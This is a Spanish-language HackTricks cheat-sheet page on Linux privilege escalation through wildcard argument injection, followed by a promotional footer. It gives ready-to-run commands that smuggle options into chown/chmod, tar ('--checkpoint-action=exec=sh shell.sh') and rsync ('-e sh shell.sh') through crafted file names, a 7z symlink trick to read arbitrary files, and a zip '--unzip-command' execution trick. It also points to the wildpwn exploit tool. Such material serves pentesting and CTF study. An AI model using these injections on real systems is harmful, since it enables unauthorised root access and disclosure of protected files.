hacktricks/linux-hardening/privilege-escalation/wildcards-spare-tricks.md

chown, chmod

Puedes indicar qué propietario de archivo y permisos quieres copiar para el resto de los archivos.

touch "--reference=/my/own/path/filename"

Puedes explotar esto usando https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (ataque combinado)
__Más información en https://www.exploit-db.com/papers/33930

Tar

Ejecutar comandos arbitrarios:

touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"

Puedes explotar esto usando https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (ataque tar)
__Más información en https://www.exploit-db.com/papers/33930

Rsync

Ejecutar comandos arbitrarios:

Interesting rsync option from manual:

 -e, --rsh=COMMAND           specify the remote shell to use
     --rsync-path=PROGRAM    specify the rsync to run on remote machine

touch "-e sh shell.sh"

Puedes explotar esto usando https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (ataque rsync)
__Más información en https://www.exploit-db.com/papers/33930

7z

En 7z, incluso usando -- antes de * (nota que -- significa que la entrada siguiente no puede ser tratada como parámetros, solo como rutas de archivo en este caso), puedes causar un error arbitrario para leer un archivo, así que si un comando como el siguiente está siendo ejecutado por root:

7za a /backup/$filename.zip -t7z -snl -p$pass -- *

Y puedes crear archivos en la carpeta donde se está ejecutando esto, podrías crear el archivo @root.txt y el archivo root.txt siendo un enlace simbólico al archivo que deseas leer:

cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt

Entonces, cuando se ejecuta 7z, tratará root.txt como un archivo que contiene la lista de archivos que debe comprimir (eso es lo que indica la existencia de @root.txt) y cuando 7z lea root.txt, leerá /file/you/want/to/read y como el contenido de este archivo no es una lista de archivos, arrojará un error mostrando el contenido.

Más información en los Write-ups de la máquina CTF de HackTheBox.

Zip

Ejecutar comandos arbitrarios:

zip name.zip files -T --unzip-command "sh -c whoami"

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los PLANES DE SUSCRIPCIÓN!

• Descubre The PEASS Family, nuestra colección exclusiva de NFTs

• Obtén la oficial PEASS & HackTricks swag

• Únete al 💬 grupo de Discord o al grupo de telegram o sígueme en Twitter 🐦@carlospolopm.

• Comparte tus trucos de hacking enviando PRs al repositorio de hacktricks y al repositorio de hacktricks-cloud.